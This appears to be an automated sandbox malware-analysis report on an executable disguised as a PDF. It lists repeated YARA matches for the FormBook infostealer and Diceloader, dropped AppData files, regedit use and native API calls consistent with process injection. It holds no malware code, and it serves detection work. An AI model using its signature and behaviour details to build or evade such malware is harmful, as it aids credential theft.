Source: Yara match	File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Detected FormBook malware

Source: C:\Windows\SysWOW64\ipconfig.exe	Dropped file: C:\Users\user\AppData\Roaming\J8AR3449\J8Alogrv.ini			Jump to dropped file
Source: C:\Windows\SysWOW64\ipconfig.exe	Dropped file: C:\Users\user\AppData\Roaming\J8AR3449\J8Alogri.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4604222907.0000000011264000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 2720, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: csc.exe PID: 6324, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: Process Memory Space: ipconfig.exe PID: 6968, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 6512, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: calc.exe PID: 2300, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 6272, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmmon32.exe PID: 5376, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: wmplayer.exe PID: 6672, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: raserver.exe PID: 1088, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Uses regedit.exe to modify the Windows registry

Source: C:\Users\user\101 2043 5770 pdf.exe

Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A330 NtCreateFile,	6_2_0041A330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A3E0 NtReadFile,	6_2_0041A3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A460 NtClose,	6_2_0041A460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A510 NtAllocateVirtualMemory,	6_2_0041A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A2EA NtCreateFile,	6_2_0041A2EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041A32B NtCreateFile,	6_2_0041A32B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2DD0 NtDelayExecution,LdrInitializeThunk,	6_2_059A2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_059A2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_059A2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_059A2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_059A2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_059A2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2F90 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_059A2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2FB0 NtResumeThread,LdrInitializeThunk,	6_2_059A2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2FE0 NtCreateFile,LdrInitializeThunk,	6_2_059A2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2F30 NtCreateSection,LdrInitializeThunk,	6_2_059A2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_059A2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_059A2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_059A2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2B60 NtClose,LdrInitializeThunk,	6_2_059A2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2AD0 NtReadFile,LdrInitializeThunk,	6_2_059A2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A35C0 NtCreateMutant,	6_2_059A35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A4650 NtSuspendThread,	6_2_059A4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A3090 NtSetValueKey,	6_2_059A3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A3010 NtOpenDirectoryObject,	6_2_059A3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A4340 NtSetContextThread,	6_2_059A4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2DB0 NtEnumerateKey,	6_2_059A2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A3D10 NtOpenProcessToken,	6_2_059A3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2D00 NtSetInformationFile,	6_2_059A2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A3D70 NtOpenThread,	6_2_059A3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2CC0 NtQueryVirtualMemory,	6_2_059A2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2CF0 NtOpenProcess,	6_2_059A2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2C00 NtQueryInformationProcess,	6_2_059A2C00
